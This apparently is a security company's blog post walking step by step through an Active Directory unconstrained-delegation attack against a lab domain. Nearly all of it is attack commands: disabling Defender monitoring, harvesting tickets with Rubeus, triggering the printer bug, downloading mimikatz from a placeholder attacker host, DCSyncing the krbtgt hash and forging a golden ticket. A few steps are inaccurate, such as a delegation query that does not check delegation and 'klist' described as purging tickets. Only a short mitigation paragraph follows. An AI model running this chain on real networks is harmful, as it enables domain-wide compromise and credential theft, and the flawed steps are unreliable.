Practical Demo of the Unconstrained Delegation Attack
There has been many publications out there explaining various ways to attack an unconstrained delegation. This research/post is to practically show how such misconfiguration can be exploited easily and effectively. To further understand this kind of attack, check out the resources at the bottom below.
Let’s get started:
To perform this kind of attack,
- Gain access to a domain controller (DCB) in ForestB.
- Monitor for logon event through LSA API with Rubeus.exe: Rubeus.exe.
- Use a MS-RPRN.exe to trigger the “printer bug” against DCA.
- Trigger the MS-RPRN “printer bug” against a domain controller (e.g. DCA) in ForestA.
- Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
- Perform DCSYNC attack to retrieve the TGT credentials.
- Forge a golden ticket.
- Domain controller(DCA) in ForestA gets compromised.
Practical Demo:
we can see we are now logged in to the DB-Server.
Find a computer on the domain that has unrestricted kerberos delegation property set using the command:
Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders
Lets try to install the Active Directory Module for PowerShell. The AD module is already installed on domain controllers on Windows Server but on member servers, you can add the module as a feature in Server Manager or using PowerShell command below:
get-windowsfeature | where name -like RSAT-AD-PowerShell | Install-WindowsFeature
Now retry with the previous command to find a computer on the domain that has unrestricted kerberos delegation property:
Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders
We check if our server DB-SERVER has a TrustedForDelegation set to TRUE. If yes, we can start our attack
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Attack time:
Have 2 shells (lets call that shell 1 and shell 2)opened so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.
Disable real time AV monitoring from the shell with command:
Set-MpPreference -DisableRealtimeMonitoring $true
Upload MS-RPRN.exe and Rubeus.exe
In shell on the left (port 2222) use Rubeus to harvest for TGTs every 3 seconds with the command:
Rubeus.exe harvest /interval:3
and in shell on the right (port 3333) use MS-RPRN to request the TGTs
c:\Users\Public\MS-RPRN.exe \\OPS-CHILDDC.operations.atomic.site \\DB-SERVER.operations.atomic.site
\\OPS-CHILDDC.operations.atomic.site = is the domain controller we want to compromise
\\DB-SERVER.operations.atomic.site = is the machine with delegation enabled that we control.
remove spaces from captured hash ticket and save it into a file
pass the ticket with Rubeus.exe
Rubeus.exe ptt /ticket:hash
Let’s purge user kerberos ticket without Logoff with command:
klist
To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.
Upload mimikatz to target. Remember we already disabled real-time monitoring from the start of our attack
powershell.exe Invoke-WebRequest -Uri ‘http://my-ip-here/mimikatz.exe' -Outfile mimikatz.exe
mimikatz.exe “privilege::debug” “lsadump::dcsync /user:OPERATIONS\krbtgt” exit
let’s forge a golden ticket
kerberos::golden /User:administrator /domain:OPS-CHILDDC.operations.atomic.site /sid:S-1–5–21–3757735274–1965336150–1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt
we can now view shared directories on our target domain controller
dir \\OPS-CHILDDC.operations.atomic.site\C$
Mitigations from Unconstrained Delegation:
You should be able to turn on constraints to limit the SPNs delegation can work for.
Placing privileged users in the Protected Users group will prevent them from being used in delegation and keep their TGTs off these computers after they authenticate. The same goes for the Account, which is sensitive and cannot be a delegate option.
Resources: :
https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/
You can also check out our services on:: https://www.inveteckglobal.com/